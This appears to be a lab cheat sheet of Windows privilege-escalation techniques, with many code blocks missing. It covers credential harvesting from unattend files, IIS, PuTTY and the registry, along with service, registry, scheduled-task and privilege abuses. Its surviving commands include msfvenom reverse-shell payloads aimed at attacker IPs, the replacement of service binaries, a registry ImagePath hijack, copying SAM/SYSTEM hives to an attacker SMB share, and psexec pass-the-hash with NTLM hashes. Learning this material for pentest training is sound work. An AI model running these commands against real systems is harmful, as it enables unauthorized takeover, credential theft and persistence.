Windows Privilege Escalation
Harvesting Passwords
Leftover
When installing Windows on a large number of hosts, administrators may use Windows Deployment Services. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:
type C:\Unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattend\Unattend.xml
type C:\Windows\system32\sysprep.inf
type C:\Windows\system32\sysprep\sysprep.xml
History
Whenever a user runs a command using Powershell, it gets stored into a file that keeps a memory of past commands.
Saved Credentials
Windows allows us to use other users' credentials. This function also gives the option to save these credentials on the system. The command below will list saved credentials:
While you can't see the actual passwords, if you notice any credentials worth trying, you can use them with the runas command and the /savecred option, as seen below.IIS Configuration
Internet Information Services (IIS) is the default web server on Windows installations. The configuration of websites on IIS is stored in a file called web.config and can store passwords for databases or configured authentication mechanisms. Depending on the installed version of IIS, we can find web.config in one of the following locations:
- C:\inetpub\wwwroot\web.config
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
Here is a quick way to find database connection strings on the file:
Credentials From PuTTY
PuTTY is an SSH client commonly found on Windows systems. Instead of having to specify a connection's parameters every single time, users can store sessions where the IP, user and other configurations can be stored for later use. While PuTTY won't allow users to store their SSH password, it will store proxy configurations that include cleartext authentication credentials. To retrieve the stored proxy credentials, you can search under the following registry key for ProxyPassword with the following command:
Scheduled Tasks
Overwrite task file
List scheduled task
Show task details Check file permission Check file permission Overwrite file Run taskRegistry
AutoRuns
Query the registry for AutoRun executables
OR you can use Autoruns64.exe Using accesschk.exe, note that one of the AutoRun executables is writable by everyone Copy the reverse.exe executable you created and overwrite the AutoRun executable with it Start a listener on Kali and then restart the Windows VM. Open up a new RDP session to trigger a reverse shell running with admin privileges.AlwaysInstallElevated
Windows installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges.
Query registry values
- To be able to exploit this vulnerability, both should be set 1 (0x1). - Otherwise, exploitation will not be possible.Generate a malicious .msi file using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.12.153 LPORT=LOCAL_PORT -f msi -o malicious.msi
Passwords
The registry can be searched for keys and values that contain the word "password":
$user='Administrator'
$pass='Welcome1!'
$securePass = ConvertTo-SecureString $pass -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $user, $securePass
Start-Process ./shell-4445-x86.exe -Credential $credential
Service
Overwrite executable file
Vulnerability: Insecure Service Executables, If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account trivially.
Query the service configuration [windows-cmd]
Check the permissions on the executable [windows-ps] Let's generate an exe-service payload using msfvenom and serve it through a python webserver [linux]msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.9.175 LPORT=4444 -f exe-service -o rev-shell.exe
cd C:\PROGRA~2\SYSTEM~1\
cd 'C:\Program Files (x86)\SystemScheduler'
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-shell.exe WService.exe
icacls WService.exe /grant Everyone:F
Add executable file upper in path hierarchy
Vulnerability: Unquoted Service Paths
List services and path [windows-ps]
search for any unusual path or path where you can write access
check service configuration [windows-cmd]
Example path Check path- C:\MyPrograms\Disk Sorter Enterprise\bin\
- C:\MyPrograms\Disk Sorter Enterprise\
- C:\MyPrograms\
Windows will search for
- C:\MyPrograms\Disk.exe
- C:\MyPrograms\Disk Sorter.exe
- C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
Check permission [windows-cmd]
icacls "c:\MyPrograms\Disk Sorter Enterprise\bin"
icacls "c:\MyPrograms\Disk Sorter Enterprise"
icacls "c:\MyPrograms"
Modified service configuration
Vulnerability: Insecure Service Permissions To Configuration
list all services [windows-ps]
check service configuration
check permissions of service [windows-ps]
- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
- Open command prompt and type
- check for SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS permission Create exploit [linux] Start server [linux] Setup listener [linux] We can then pull the payload from Powershell with the following command [windows-ps] Grant access [windows-ps] Update service configuration [windows-cmd] Stop and start [windows-cmd]
Modified service registry configuration
Vulnerability: Weak Registry Permissions
Using accesschk.exe note that the registry entry for the regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users)
To check that configuration you can alsow use Overwrite the ImagePath registry key to point to the reverse.exe executable you createdreg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
Windows Privileges
Info
Privileges are rights that an account has to perform specific system-related tasks. These tasks can be as simple as the privilege to shut down the machine up to privileges to bypass some DACL-based access controls.
Each user has a set of assigned privileges that can be checked with the following command:
From an attacker's standpoint, only those privileges that allow us to escalate in the system are of interest. You can find a comprehensive list of exploitable privileges on https://github.com/gtworek/Priv2AdminSeImpersonatePrivilege
PrintSpoofer exploit that can be used to escalate service user permissions on Windows Server 2016, Server 2019, and Windows 10. To escalate privileges, the service account must have SeImpersonate privileges.
SeBackup / SeRestore
The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges.
Having this power, an attacker can trivially escalate privileges on the system by using many techniques. The one we will look at consists of copying the SAM and SYSTEM registry hives to extract the local Administrator's password hash.
on Windows, backup the SAM and SYSTEM hashes
on Windows, send files to SMB Server on Kalicopy C:\Users\THMBackup\sam.hive \\10.18.9.175\public\
copy C:\Users\THMBackup\system.hive \\10.18.9.175\public\
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
admin:1001:<LM>:<NTLM>:::
/opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 administrator@10.10.233.61
SeTakeOwnership
The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges, as we could, for example, search for a service running as SYSTEM and take ownership of the service's executable.
cmd as administrator
takeover the file give your user full permissions replace utilman.exe with a copy of cmd.exe triger utilman - lock screen from the start button - click on the "Ease of Access" buttonStartup Applications
Add new startup application
- Open command prompt and type
- From the output notice that the BUILTIN\Users group has full access ‘(F)’ to the directory
- exploitation
- setup lisener
- generete reverse shell as exe file rshell.exe
- copy rshell.exe into 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup'
- Logoff & Login
Vulnerable software
- dump information it can gather on installed software
- check software in exploit.db